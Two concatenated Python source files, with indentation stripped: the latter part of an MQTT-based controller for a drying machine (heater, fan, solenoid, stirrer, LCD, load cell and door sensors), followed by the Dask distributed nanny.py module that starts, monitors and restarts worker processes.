#---Solenoid------------------------------------------------------------
def solenoid(Sol_val, val):
Serial_Feather(pin=Sol_val, val=val)
#---Fan-----------------------------------------------------------------
def fan(Cooling_motor, val):
Serial_Feather(pin=Cooling_motor, val=val)
#---Stirrer-------------------------------------------------------------
def stirrer(Mix_motor, val):
Serial_Feather(pin=Mix_motor, val=val)
def json_to_val(json_val):
payloadData = json.loads(json_val)
if (len(payloadData) == 1):
val = payloadData['val']
return (val)
elif (len(payloadData) == 2):
val = payloadData['val']
val2 = payloadData['val2']
return (val, val2)
elif (len(payloadData) == 3):
val = payloadData['val']
val2 = payloadData['val2']
val3 = payloadData['val3']
return (val, val2, val3)
def val_to_json(val,val2=None):
if (val2 != None):
json_val = {"val":val,"val2":val2}
else:
json_val = {"val":val}
json_val = json.dumps(json_val)
return (json_val)
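# A quick round-trip sketch of the two JSON helpers above (values are illustrative):
#   val_to_json(23.5, 41.2)    -> '{"val": 23.5, "val2": 41.2}'
#   json_to_val('{"val": 1}')  -> 1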
#---MQTT----------------------------------------------------------------
def on_connect(client,userdata,flags, rc):
print('[dry_mqtt_connect] connect to ', broker_address)
def on_disconnect(client, userdata, rc=0):
# paho-mqtt 1.x invokes on_disconnect with (client, userdata, rc)
print("[dry_mqtt_disconnect] rc=" + str(rc))
def on_subscribe(client, userdata, mid, granted_qos):
print("subscribed: " + str(mid) + " " + str(granted_qos))
def func_set_q(f_msg):
if(f_msg.topic == '/set_buzzer'):
if(buzzer_running == 0):
q.put_nowait(f_msg)
#q.put(f_msg)
# Door/switch polling (/res_debug_mode, /res_start_btn, /res_*_door, /res_operation_mode) is
# published periodically from core_func(); the remaining /req_* and /print_lcd_* topics are
# serviced in mqtt_dequeue() below.
elif (f_msg.topic == '/set_solenoid'):
#print("topic: ", f_msg.topic)
data = f_msg.payload.decode('utf-8').replace("'", '"')
solenoid_val = json_to_val(data)
solenoid(Sol_val, solenoid_val)
elif (f_msg.topic == '/set_fan'):
#print("topic: ", f_msg.topic)
data = f_msg.payload.decode('utf-8').replace("'", '"')
fan_val = json_to_val(data)
fan(Cooling_motor, fan_val)
elif (f_msg.topic == '/set_heater'):
#print("topic: ", f_msg.topic)
data = f_msg.payload.decode('utf-8').replace("'", '"')
heat_val, heat_val2, heat_val3 = json_to_val(data)
heater(Heat_12, Heat_3, Heat_4, heat_val, heat_val2, heat_val3)
elif (f_msg.topic == '/set_stirrer'):
#print("topic: ", f_msg.topic)
data = f_msg.payload.decode('utf-8').replace("'", '"')
stirrer_val = json_to_val(data)
stirrer(Mix_motor, stirrer_val)
# /set_buzzer and /set_zero_point are serviced in mqtt_dequeue() below.
else:
q.put_nowait(f_msg)
#q.put(f_msg)
def on_message(client, userdata, _msg):
func_set_q(_msg)
#-----------------------------------------------------------------------
#---INIT LCD & Display Message------------------------------------------
def lcd_init():
# Rebind the module-level handle so the OSError retry paths in the display helpers get a fresh LCD object.
global g_lcd
lcd_columns = 20
lcd_rows = 4
i2c = busio.I2C(board.SCL, board.SDA)
lcd = character_lcd.Character_LCD_I2C(i2c, lcd_columns, lcd_rows)
lcd.backlight = True
g_lcd = lcd
return lcd
def displayState(msg1):
print(msg1)
if (len(str(msg1)) > 5):
msg1 = str(msg1)
msg1 = msg1[0:5]
try:
if (msg1 == 'DEBUG'):
g_lcd.clear()
g_lcd.cursor_position(0,0)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(0,0)
g_lcd.message = f'{msg1}'
except OSError:
lcd_init()
if (msg1 == 'DEBUG'):
g_lcd.clear()
g_lcd.cursor_position(0,0)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(0,0)
g_lcd.message = f'{msg1}'
def displayTemp(msg1, msg2):
if (len(str(msg1)) > 5):
msg1 = str(msg1)
msg1 = msg1[0:5]
if (len(str(msg2)) > 5):
msg2 = str(msg2)
msg2 = msg2[0:5]
try:
g_lcd.cursor_position(8,0)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(8,0)
g_lcd.message = f'{msg1}'
g_lcd.cursor_position(14,0)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(14,0)
g_lcd.message = f'{msg2}'
except OSError:
lcd_init()
g_lcd.cursor_position(8,0)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(8,0)
g_lcd.message = f'{msg1}'
g_lcd.cursor_position(14,0)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(14,0)
g_lcd.message = f'{msg2}'
def displayLoadcell(msg1, msg2):
if (len(str(msg1)) > 5):
msg1 = str(msg1)
msg1 = msg1[0:5]
if (len(str(msg2)) > 5):
msg2 = str(msg2)
msg2 = msg2[0:5]
try:
g_lcd.cursor_position(0,1)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(0,1)
g_lcd.message = f'{msg1}'
g_lcd.cursor_position(10,1)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(10,1)
g_lcd.message = f'{msg2}'
except OSError:
lcd_init()
g_lcd.cursor_position(0,1)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(0,1)
g_lcd.message = f'{msg1}'
g_lcd.cursor_position(10,1)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(10,1)
g_lcd.message = f'{msg2}'
def displayLoadcellFactor(msg1):
if (len(str(msg1)) > 6):
msg1 = str(msg1)
msg1 = msg1[0:6]
try:
g_lcd.cursor_position(14,1)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(14,1)
g_lcd.message = f'{msg1}'
except OSError:
lcd_init()
g_lcd.cursor_position(14,1)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(14,1)
g_lcd.message = f'{msg1}'
def displayInputDoor(msg1):
if (len(str(msg1)) > 1):
msg1 = str(msg1)
msg1 = msg1[0:1]
try:
g_lcd.cursor_position(15,2)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(15,2)
g_lcd.message = f'{msg1}'
except OSError:
lcd_init()
g_lcd.cursor_position(15,2)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(15,2)
g_lcd.message = f'{msg1}'
def displayOutputDoor(msg1):
if (len(str(msg1)) > 1):
msg1 = str(msg1)
msg1 = msg1[0:1]
try:
g_lcd.cursor_position(17,2)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(17,2)
g_lcd.message = f'{msg1}'
except OSError:
lcd_init()
g_lcd.cursor_position(17,2)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(17,2)
g_lcd.message = f'{msg1}'
def displaySafeDoor(msg1):
if (len(str(msg1)) > 1):
msg1 = str(msg1)
msg1 = msg1[0:1]
try:
g_lcd.cursor_position(19,2)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(19,2)
g_lcd.message = f'{msg1}'
except OSError:
lcd_init()
g_lcd.cursor_position(19,2)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(19,2)
g_lcd.message = f'{msg1}'
def displayElapsed(msg1):
if (len(str(msg1)) > 8):
msg1 = str(msg1)
msg1 = msg1[0:8]
try:
g_lcd.cursor_position(0,2)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(0,2)
g_lcd.message = f'{msg1}'
except OSError:
lcd_init()
g_lcd.cursor_position(0,2)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(0,2)
g_lcd.message = f'{msg1}'
def displayMsg(msg1):
if (len(str(msg1)) > 20):
msg1 = str(msg1)
msg1 = msg1[0:20]
try:
g_lcd.cursor_position(0,3)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(0,3)
g_lcd.message = f'{msg1}'
except OSError:
lcd_init()
g_lcd.cursor_position(0,3)
message = ' '
g_lcd.message = message
g_lcd.cursor_position(0,3)
g_lcd.message = f'{msg1}'
#-----------------------------------------------------------------------
#=======================================================================
global dry_client
broker_address = "localhost"
port = 1883
global g_lcd
g_lcd = lcd_init()
dry_client = mqtt.Client()
dry_client.on_connect = on_connect
dry_client.on_disconnect = on_disconnect
dry_client.on_subscribe = on_subscribe
dry_client.on_message = on_message
dry_client.connect(broker_address, port)
dry_client.subscribe("/print_lcd_internal_temp")
dry_client.subscribe("/print_lcd_state")
dry_client.subscribe("/print_lcd_debug_message")
dry_client.subscribe("/print_lcd_loadcell")
dry_client.subscribe("/print_lcd_loadcell_factor")
dry_client.subscribe("/print_lcd_elapsed_time")
dry_client.subscribe("/print_lcd_input_door")
dry_client.subscribe("/print_lcd_output_door")
dry_client.subscribe("/print_lcd_safe_door")
dry_client.subscribe("/req_zero_point")
dry_client.subscribe("/req_internal_temp")
dry_client.subscribe("/req_debug_mode")
dry_client.subscribe("/req_start_btn")
dry_client.subscribe("/req_calc_factor")
dry_client.subscribe("/req_input_door")
dry_client.subscribe("/req_output_door")
dry_client.subscribe("/req_safe_door")
dry_client.subscribe("/req_weight")
dry_client.subscribe("/req_operation_mode")
dry_client.subscribe("/set_solenoid")
dry_client.subscribe("/set_fan")
dry_client.subscribe("/set_heater")
dry_client.subscribe("/set_stirrer")
dry_client.subscribe("/set_buzzer")
dry_client.subscribe("/set_zero_point")
dry_client.loop_start()
global correlation_value
correlation_value = 0
loadcell_param = {"factor":6555,"correlation_value":200}
if not os.path.isfile("./factor.json"):
with open("./factor.json","w") as refUnit_json:
json.dump(loadcell_param, refUnit_json)
loadcell_factor = loadcell_param['factor']
else:
with open ("./factor.json", 'r') as refUnit_json:
loadcell_factor = json.load(refUnit_json)
loadcell_factor = loadcell_factor['factor']
init_loadcell(loadcell_factor)
global ser
ser = serial.Serial("/dev/ttyAMA0", 9600)
global set_ref_Unit
set_ref_Unit = 1
weight_arr = [0, 0, 0, 0, 0]
flag = 0
def mqtt_dequeue(q):
# The handlers below update these module-level values (e.g. get_loadcell reads correlation_value).
global buzzer_running, correlation_value, set_ref_Unit
while True:
if not q.empty():
try:
recv_msg = q.get(False)
g_recv_topic = recv_msg.topic
print(g_recv_topic)
if (g_recv_topic == '/req_internal_temp'):
#print("topic: ", g_recv_topic)
temperature = get_temp()
dry_client.publish("/res_internal_temp", temperature)
elif (g_recv_topic == '/req_zero_point'):
#print("topic: ", g_recv_topic)
data = recv_msg.payload.decode('utf-8').replace("'", '"')
reference_weight = json.loads(data)
reference_weight = reference_weight['val']
#print ("reference_weight: ", reference_weight)
val = ref_weight(reference_weight)
dry_client.publish("/res_zero_point", val)
elif (g_recv_topic == '/req_calc_factor'):
#print("topic: ", g_recv_topic)
calc_referenceUnit = calc_ref_Unit(reference_weight, set_ref_Unit)
dry_client.publish("/res_calc_factor", calc_referenceUnit)
elif (g_recv_topic == '/req_weight'):
#print("topic: ", g_recv_topic)
weight = get_loadcell()
#print(weight)
dry_client.publish("/res_weight", weight)
elif (g_recv_topic == '/print_lcd_internal_temp'):
#print("topic: ", g_recv_topic)
data = recv_msg.payload.decode('utf-8').replace("'", '"')
top, bottom = json_to_val(data)
#print ('print_lcd: ', top, ' ', bottom)
displayTemp(top, bottom)
elif (g_recv_topic == '/print_lcd_state'):
#print("topic: ", g_recv_topic)
data = recv_msg.payload.decode('utf-8').replace("'", '"')
state = json_to_val(data)
displayState(state)
print('print_lcd_state')
elif (g_recv_topic == '/print_lcd_debug_message'):
#print("topic: ", g_recv_topic)
data = recv_msg.payload.decode('utf-8').replace("'", '"')
debug = json_to_val(data)
#print (debug)
displayMsg(debug)
print('print_lcd_debug_message')
elif (g_recv_topic == '/print_lcd_loadcell'):
#print("topic: ", g_recv_topic)
data = recv_msg.payload.decode('utf-8').replace("'", '"')
loadcell, target_loadcell = json_to_val(data)
loadcell = str(loadcell)
#print(loadcell, ' ', target_loadcell)
target_loadcell = str(target_loadcell)
#loadcell = (loadcell[2:(len(loadcell)-5)])
#target_loadcell = (target_loadcell[2:(len(target_loadcell)-5)])
displayLoadcell(loadcell, target_loadcell)
elif (g_recv_topic == '/print_lcd_loadcell_factor'):
#print("topic: ", g_recv_topic)
data = recv_msg.payload.decode('utf-8').replace("'", '"')
loadcell_factor, corr_val = json_to_val(data)
displayLoadcellFactor(loadcell_factor)
elif (g_recv_topic == '/print_lcd_input_door'):
#print("topic: ", g_recv_topic)
data = recv_msg.payload.decode('utf-8').replace("'", '"')
input_door = json_to_val(data)
displayInputDoor(input_door)
elif (g_recv_topic == '/print_lcd_output_door'):
#print("topic: ", g_recv_topic)
data = recv_msg.payload.decode('utf-8').replace("'", '"')
output_door = json_to_val(data)
displayOutputDoor(output_door)
print('print_lcd_output_door')
elif (g_recv_topic == '/print_lcd_safe_door'):
#print("topic: ", g_recv_topic)
data = recv_msg.payload.decode('utf-8').replace("'", '"')
val_safe_door = json_to_val(data)
displaySafeDoor(val_safe_door)
elif (g_recv_topic == '/print_lcd_elapsed_time'):
#print("topic: ", g_recv_topic)
data = recv_msg.payload.decode('utf-8').replace("'", '"')
elapsed_time = json_to_val(data)
elapsed_time = str(datetime.timedelta(seconds=elapsed_time))
displayElapsed(elapsed_time)
# /set_solenoid, /set_fan, /set_heater and /set_stirrer are serviced directly in func_set_q() above.
elif (g_recv_topic == '/set_buzzer'):
#print("topic: ", g_recv_topic)
buzzer_running = 1
data = recv_msg.payload.decode('utf-8').replace("'", '"')
buzzer_val = json_to_val(data)
buzzer(Buzzer, buzzer_val)
buzzer_running = 0
elif (g_recv_topic == '/set_zero_point'):
#print("topic: ", g_recv_topic)
data = recv_msg.payload.decode('utf-8').replace("'", '"')
set_ref_Unit, set_corr_val = json_to_val(data)
#print('set_zero_point - ',set_ref_Unit, ', ', set_corr_val)
set_ref_Unit = float(set_ref_Unit)
correlation_value = float(set_corr_val)
set_factor(set_ref_Unit)
except queue.Empty:
continue
q.task_done()
def core_func(q):
period = 10000
while_count = 0
while True:
while_count = while_count + 1
#print(while_count)
if ((while_count % period) == 0):
deb = debug_mode(Debug_switch_pin)
dry_client.publish("/res_debug_mode", deb)
if ((while_count % period) == 0):
#print("topic: ", msg.topic)
sw4_json = start_btn(SW4_pin)
dry_client.publish("/res_start_btn", sw4_json)
if ((while_count % period) == 0):
#print("topic: ", msg.topic)
json_input_door = get_input_door(Input_Door_pin)
#print('input door: ', json_input_door)
dry_client.publish("/res_input_door", json_input_door)
if ((while_count % period) == 0):
#print("topic: ", msg.topic)
json_output_door = get_output_door(Output_Door_pin)
#print("output door: ", json_output_door)
dry_client.publish("/res_output_door", json_output_door)
if ((while_count % period) == 0):
#print("topic: ", msg.topic)
json_safe_door = get_safe_door(Safe_Door_pin)
#print("safe door: ", json_safe_door)
dry_client.publish("/res_safe_door", json_safe_door)
if ((while_count % period) == 0):
#print("topic: ", msg.topic)
json_operation_mode = Operation(Select_SW)
#print("operation: ", json_operation_mode)
dry_client.publish("/res_operation_mode", json_operation_mode)
#g_lcd.backlight = True
from multiprocessing import Process
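# Caveat: q is a plain queue.Queue created in this parent process; each multiprocessing.Process
# below receives a copy rather than a shared queue, so items enqueued by the MQTT callback
# thread in the parent never reach mqtt_dequeue in the child. Running these workers as threads,
# or switching to multiprocessing.Queue, would be needed for the hand-off to work as intended.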
def main():
p1 = Process(target=mqtt_dequeue, args=(q,))
p1.start()
p2 = Process(target=core_func, args=(q,))
p2.start()
p1.join()
p2.join()
if __name__ == "__main__":
main()
|
nanny.py | from __future__ import annotations
import asyncio
import errno
import logging
import os
import shutil
import threading
import uuid
import warnings
import weakref
from contextlib import suppress
from inspect import isawaitable
from queue import Empty
from time import sleep as sync_sleep
from typing import ClassVar
import psutil
from tornado import gen
from tornado.ioloop import IOLoop, PeriodicCallback
import dask
from dask.system import CPU_COUNT
from dask.utils import parse_timedelta
from . import preloading
from .comm import get_address_host, unparse_host_port
from .comm.addressing import address_from_user_args
from .core import CommClosedError, RPCClosed, Status, coerce_to_address, error_message
from .diagnostics.plugin import _get_plugin_name
from .metrics import time
from .node import ServerNode
from .process import AsyncProcess
from .proctitle import enable_proctitle_on_children
from .protocol import pickle
from .security import Security
from .utils import (
TimeoutError,
get_ip,
json_load_robust,
log_errors,
mp_context,
parse_ports,
silence_logging,
)
from .worker import Worker, parse_memory_limit, run
logger = logging.getLogger(__name__)
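# A minimal usage sketch, not taken from this module: it assumes a scheduler is already
# listening at the address shown, and the address and keyword values are illustrative.
#
#   import asyncio
#   from distributed import Nanny
#
#   async def main():
#       async with Nanny("tcp://127.0.0.1:8786", nthreads=2, memory_limit="1GB") as nanny:
#           await nanny.finished()
#
#   asyncio.run(main())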
class Nanny(ServerNode):
"""A process to manage worker processes
The nanny spins up Worker processes, watches them, and kills or restarts
them as necessary. It is necessary if you want to use the
``Client.restart`` method, or to restart the worker automatically if
it gets to the terminate fraction of its memory limit.
The parameters for the Nanny are mostly the same as those for the Worker
with exceptions listed below.
Parameters
----------
env: dict, optional
Environment variables set at the time of Nanny initialization are
guaranteed to be set in the Worker process as well. This argument allows one
to overwrite or otherwise set environment variables for the Worker. It is
also possible to set environment variables using the option
`distributed.nanny.environ`. Precedence is as follows:
1. Nanny arguments
2. Existing environment variables
3. Dask configuration
See Also
--------
Worker
"""
_instances: ClassVar[weakref.WeakSet[Nanny]] = weakref.WeakSet()
process = None
status = Status.undefined
def __init__(
self,
scheduler_ip=None,
scheduler_port=None,
scheduler_file=None,
worker_port=0,
nthreads=None,
loop=None,
local_dir=None,
local_directory=None,
services=None,
name=None,
memory_limit="auto",
reconnect=True,
validate=False,
quiet=False,
resources=None,
silence_logs=None,
death_timeout=None,
preload=None,
preload_argv=None,
preload_nanny=None,
preload_nanny_argv=None,
security=None,
contact_address=None,
listen_address=None,
worker_class=None,
env=None,
interface=None,
host=None,
port=None,
protocol=None,
config=None,
**worker_kwargs,
):
self._setup_logging(logger)
self.loop = loop or IOLoop.current()
if isinstance(security, dict):
security = Security(**security)
self.security = security or Security()
assert isinstance(self.security, Security)
self.connection_args = self.security.get_connection_args("worker")
if local_dir is not None:
warnings.warn("The local_dir keyword has moved to local_directory")
local_directory = local_dir
if local_directory is None:
local_directory = dask.config.get("temporary-directory") or os.getcwd()
self._original_local_dir = local_directory
local_directory = os.path.join(local_directory, "dask-worker-space")
else:
self._original_local_dir = local_directory
self.local_directory = local_directory
if not os.path.exists(self.local_directory):
os.makedirs(self.local_directory, exist_ok=True)
self.preload = preload
if self.preload is None:
self.preload = dask.config.get("distributed.worker.preload")
self.preload_argv = preload_argv
if self.preload_argv is None:
self.preload_argv = dask.config.get("distributed.worker.preload-argv")
if preload_nanny is None:
preload_nanny = dask.config.get("distributed.nanny.preload")
if preload_nanny_argv is None:
preload_nanny_argv = dask.config.get("distributed.nanny.preload-argv")
self.preloads = preloading.process_preloads(
self, preload_nanny, preload_nanny_argv, file_dir=self.local_directory
)
if scheduler_file:
cfg = json_load_robust(scheduler_file)
self.scheduler_addr = cfg["address"]
elif scheduler_ip is None and dask.config.get("scheduler-address"):
self.scheduler_addr = dask.config.get("scheduler-address")
elif scheduler_port is None:
self.scheduler_addr = coerce_to_address(scheduler_ip)
else:
self.scheduler_addr = coerce_to_address((scheduler_ip, scheduler_port))
if protocol is None:
protocol_address = self.scheduler_addr.split("://")
if len(protocol_address) == 2:
protocol = protocol_address[0]
self._given_worker_port = worker_port
self.nthreads = nthreads or CPU_COUNT
self.reconnect = reconnect
self.validate = validate
self.resources = resources
self.death_timeout = parse_timedelta(death_timeout)
self.Worker = Worker if worker_class is None else worker_class
config_environ = dask.config.get("distributed.nanny.environ", {})
if not isinstance(config_environ, dict):
raise TypeError(
f"distributed.nanny.environ configuration must be of type dict. Instead got {type(config_environ)}"
)
self.env = config_environ.copy()
for k in self.env:
if k in os.environ:
self.env[k] = os.environ[k]
if env:
self.env.update(env)
self.env = {k: str(v) for k, v in self.env.items()}
self.config = config or dask.config.config
worker_kwargs.update(
{
"port": worker_port,
"interface": interface,
"protocol": protocol,
"host": host,
}
)
self.worker_kwargs = worker_kwargs
self.contact_address = contact_address
self.memory_terminate_fraction = dask.config.get(
"distributed.worker.memory.terminate"
)
self.services = services
self.name = name
self.quiet = quiet
self.auto_restart = True
self.memory_limit = parse_memory_limit(memory_limit, self.nthreads)
if silence_logs:
silence_logging(level=silence_logs)
self.silence_logs = silence_logs
handlers = {
"instantiate": self.instantiate,
"kill": self.kill,
"restart": self.restart,
# cannot call it 'close' on the rpc side for naming conflict
"get_logs": self.get_logs,
"terminate": self.close,
"close_gracefully": self.close_gracefully,
"run": self.run,
"plugin_add": self.plugin_add,
"plugin_remove": self.plugin_remove,
}
self.plugins = {}
super().__init__(
handlers=handlers, io_loop=self.loop, connection_args=self.connection_args
)
self.scheduler = self.rpc(self.scheduler_addr)
if self.memory_limit:
pc = PeriodicCallback(self.memory_monitor, 100)
self.periodic_callbacks["memory"] = pc
if (
not host
and not interface
and not self.scheduler_addr.startswith("inproc://")
):
host = get_ip(get_address_host(self.scheduler.address))
self._start_port = port
self._start_host = host
self._interface = interface
self._protocol = protocol
self._listen_address = listen_address
Nanny._instances.add(self)
self.status = Status.init
def __repr__(self):
return "<Nanny: %s, threads: %d>" % (self.worker_address, self.nthreads)
async def _unregister(self, timeout=10):
if self.process is None:
return
worker_address = self.process.worker_address
if worker_address is None:
return
allowed_errors = (TimeoutError, CommClosedError, EnvironmentError, RPCClosed)
with suppress(allowed_errors):
await asyncio.wait_for(
self.scheduler.unregister(address=self.worker_address), timeout
)
@property
def worker_address(self):
return None if self.process is None else self.process.worker_address
@property
def worker_dir(self):
return None if self.process is None else self.process.worker_dir
@property
def local_dir(self):
"""For API compatibility with Nanny"""
warnings.warn("The local_dir attribute has moved to local_directory")
return self.local_directory
async def start(self):
"""Start nanny, start local process, start watching"""
await super().start()
ports = parse_ports(self._start_port)
for port in ports:
start_address = address_from_user_args(
host=self._start_host,
port=port,
interface=self._interface,
protocol=self._protocol,
security=self.security,
)
try:
await self.listen(
start_address, **self.security.get_listen_args("worker")
)
except OSError as e:
if len(ports) > 1 and e.errno == errno.EADDRINUSE:
continue
else:
raise
else:
self._start_address = start_address
break
else:
raise ValueError(
f"Could not start Nanny on host {self._start_host}"
f"with port {self._start_port}"
)
self.ip = get_address_host(self.address)
for preload in self.preloads:
await preload.start()
msg = await self.scheduler.register_nanny()
for name, plugin in msg["nanny-plugins"].items():
await self.plugin_add(plugin=plugin, name=name)
logger.info(" Start Nanny at: %r", self.address)
response = await self.instantiate()
if response == Status.running:
assert self.worker_address
self.status = Status.running
else:
await self.close()
self.start_periodic_callbacks()
return self
async def kill(self, comm=None, timeout=2):
"""Kill the local worker process
Blocks until both the process is down and the scheduler is properly
informed
"""
self.auto_restart = False
if self.process is None:
return "OK"
deadline = time() + timeout
await self.process.kill(timeout=0.8 * (deadline - time()))
async def instantiate(self, comm=None) -> Status:
"""Start a local worker process
Blocks until the process is up and the scheduler is properly informed
"""
if self._listen_address:
start_arg = self._listen_address
else:
host = self.listener.bound_address[0]
start_arg = self.listener.prefix + unparse_host_port(
host, self._given_worker_port
)
if self.process is None:
worker_kwargs = dict(
scheduler_ip=self.scheduler_addr,
nthreads=self.nthreads,
local_directory=self._original_local_dir,
services=self.services,
nanny=self.address,
name=self.name,
memory_limit=self.memory_limit,
reconnect=self.reconnect,
resources=self.resources,
validate=self.validate,
silence_logs=self.silence_logs,
death_timeout=self.death_timeout,
preload=self.preload,
preload_argv=self.preload_argv,
security=self.security,
contact_address=self.contact_address,
)
worker_kwargs.update(self.worker_kwargs)
self.process = WorkerProcess(
worker_kwargs=worker_kwargs,
worker_start_args=(start_arg,),
silence_logs=self.silence_logs,
on_exit=self._on_exit_sync,
worker=self.Worker,
env=self.env,
config=self.config,
)
if self.death_timeout:
try:
result = await asyncio.wait_for(
self.process.start(), self.death_timeout
)
except TimeoutError:
await self.close(timeout=self.death_timeout)
logger.error(
"Timed out connecting Nanny '%s' to scheduler '%s'",
self,
self.scheduler_addr,
)
raise
else:
try:
result = await self.process.start()
except Exception:
await self.close()
raise
return result
async def plugin_add(self, comm=None, plugin=None, name=None):
with log_errors(pdb=False):
if isinstance(plugin, bytes):
plugin = pickle.loads(plugin)
if name is None:
name = _get_plugin_name(plugin)
assert name
self.plugins[name] = plugin
logger.info("Starting Nanny plugin %s" % name)
if hasattr(plugin, "setup"):
try:
result = plugin.setup(nanny=self)
if isawaitable(result):
result = await result
except Exception as e:
msg = error_message(e)
return msg
if getattr(plugin, "restart", False):
await self.restart()
return {"status": "OK"}
async def plugin_remove(self, comm=None, name=None):
with log_errors(pdb=False):
logger.info(f"Removing Nanny plugin {name}")
try:
plugin = self.plugins.pop(name)
if hasattr(plugin, "teardown"):
result = plugin.teardown(nanny=self)
if isawaitable(result):
result = await result
except Exception as e:
msg = error_message(e)
return msg
return {"status": "OK"}
async def restart(self, comm=None, timeout=30, executor_wait=True):
async def _():
if self.process is not None:
await self.kill()
await self.instantiate()
try:
await asyncio.wait_for(_(), timeout)
except TimeoutError:
logger.error(
f"Restart timed out after {timeout}s; returning before finished"
)
return "timed out"
else:
return "OK"
@property
def _psutil_process(self):
pid = self.process.process.pid
try:
self._psutil_process_obj
except AttributeError:
self._psutil_process_obj = psutil.Process(pid)
if self._psutil_process_obj.pid != pid:
self._psutil_process_obj = psutil.Process(pid)
return self._psutil_process_obj
def memory_monitor(self):
"""Track worker's memory. Restart if it goes above terminate fraction"""
if self.status != Status.running:
return
if self.process is None or self.process.process is None:
return None
process = self.process.process
try:
proc = self._psutil_process
memory = proc.memory_info().rss
except (ProcessLookupError, psutil.NoSuchProcess, psutil.AccessDenied):
return
frac = memory / self.memory_limit
if self.memory_terminate_fraction and frac > self.memory_terminate_fraction:
logger.warning(
"Worker exceeded %d%% memory budget. Restarting",
100 * self.memory_terminate_fraction,
)
process.terminate()
def is_alive(self):
return self.process is not None and self.process.is_alive()
def run(self, *args, **kwargs):
return run(self, *args, **kwargs)
def _on_exit_sync(self, exitcode):
self.loop.add_callback(self._on_exit, exitcode)
async def _on_exit(self, exitcode):
if self.status not in (
Status.init,
Status.closing,
Status.closed,
Status.closing_gracefully,
):
try:
await self._unregister()
except OSError:
if not self.reconnect:
await self.close()
return
try:
if self.status not in (
Status.closing,
Status.closed,
Status.closing_gracefully,
):
if self.auto_restart:
logger.warning("Restarting worker")
await self.instantiate()
elif self.status == Status.closing_gracefully:
await self.close()
except Exception:
logger.error(
"Failed to restart worker after its process exited", exc_info=True
)
@property
def pid(self):
return self.process and self.process.pid
def _close(self, *args, **kwargs):
warnings.warn("Worker._close has moved to Worker.close", stacklevel=2)
return self.close(*args, **kwargs)
def close_gracefully(self, comm=None):
"""
A signal that we shouldn't try to restart workers if they go away
This is used as part of the cluster shutdown process.
"""
self.status = Status.closing_gracefully
async def close(self, comm=None, timeout=5, report=None):
"""
Close the worker process, stop all comms.
"""
if self.status == Status.closing:
await self.finished()
assert self.status == Status.closed
if self.status == Status.closed:
return "OK"
self.status = Status.closing
logger.info("Closing Nanny at %r", self.address)
for preload in self.preloads:
await preload.teardown()
teardowns = [
plugin.teardown(self)
for plugin in self.plugins.values()
if hasattr(plugin, "teardown")
]
await asyncio.gather(*(td for td in teardowns if isawaitable(td)))
self.stop()
try:
if self.process is not None:
await self.kill(timeout=timeout)
except Exception:
pass
self.process = None
await self.rpc.close()
self.status = Status.closed
if comm:
await comm.write("OK")
await super().close()
async def _log_event(self, topic, msg):
await self.scheduler.log_event(
topic=topic,
msg=msg,
)
def log_event(self, topic, msg):
self.loop.add_callback(self._log_event, topic, msg)
class WorkerProcess:
running: asyncio.Event
stopped: asyncio.Event
# How often (in seconds) to poll the init message queue
_init_msg_interval = 0.05
def __init__(
self,
worker_kwargs,
worker_start_args,
silence_logs,
on_exit,
worker,
env,
config,
):
self.status = Status.init
self.silence_logs = silence_logs
self.worker_kwargs = worker_kwargs
self.worker_start_args = worker_start_args
self.on_exit = on_exit
self.process = None
self.Worker = worker
self.env = env
self.config = config
# Initialized when worker is ready
self.worker_dir = None
self.worker_address = None
async def start(self) -> Status:
"""
Ensure the worker process is started.
"""
enable_proctitle_on_children()
if self.status == Status.running:
return self.status
if self.status == Status.starting:
await self.running.wait()
return self.status
self.init_result_q = init_q = mp_context.Queue()
self.child_stop_q = mp_context.Queue()
uid = uuid.uuid4().hex
self.process = AsyncProcess(
target=self._run,
name="Dask Worker process (from Nanny)",
kwargs=dict(
worker_kwargs=self.worker_kwargs,
worker_start_args=self.worker_start_args,
silence_logs=self.silence_logs,
init_result_q=self.init_result_q,
child_stop_q=self.child_stop_q,
uid=uid,
Worker=self.Worker,
env=self.env,
config=self.config,
),
)
self.process.daemon = dask.config.get("distributed.worker.daemon", default=True)
self.process.set_exit_callback(self._on_exit)
self.running = asyncio.Event()
self.stopped = asyncio.Event()
self.status = Status.starting
try:
await self.process.start()
except OSError:
logger.exception("Nanny failed to start process", exc_info=True)
self.process.terminate()
self.status = Status.failed
return self.status
try:
msg = await self._wait_until_connected(uid)
except Exception:
self.status = Status.failed
self.process.terminate()
raise
if not msg:
return self.status
self.worker_address = msg["address"]
self.worker_dir = msg["dir"]
assert self.worker_address
self.status = Status.running
self.running.set()
init_q.close()
return self.status
def _on_exit(self, proc):
if proc is not self.process:
# Ignore exit of old process instance
return
self.mark_stopped()
def _death_message(self, pid, exitcode):
assert exitcode is not None
if exitcode == 255:
return "Worker process %d was killed by unknown signal" % (pid,)
elif exitcode >= 0:
return "Worker process %d exited with status %d" % (pid, exitcode)
else:
return "Worker process %d was killed by signal %d" % (pid, -exitcode)
def is_alive(self):
return self.process is not None and self.process.is_alive()
@property
def pid(self):
return self.process.pid if self.process and self.process.is_alive() else None
def mark_stopped(self):
if self.status != Status.stopped:
r = self.process.exitcode
assert r is not None
if r != 0:
msg = self._death_message(self.process.pid, r)
logger.info(msg)
self.status = Status.stopped
self.stopped.set()
# Release resources
self.process.close()
self.init_result_q = None
self.child_stop_q = None
self.process = None
# Best effort to clean up worker directory
if self.worker_dir and os.path.exists(self.worker_dir):
shutil.rmtree(self.worker_dir, ignore_errors=True)
self.worker_dir = None
# User hook
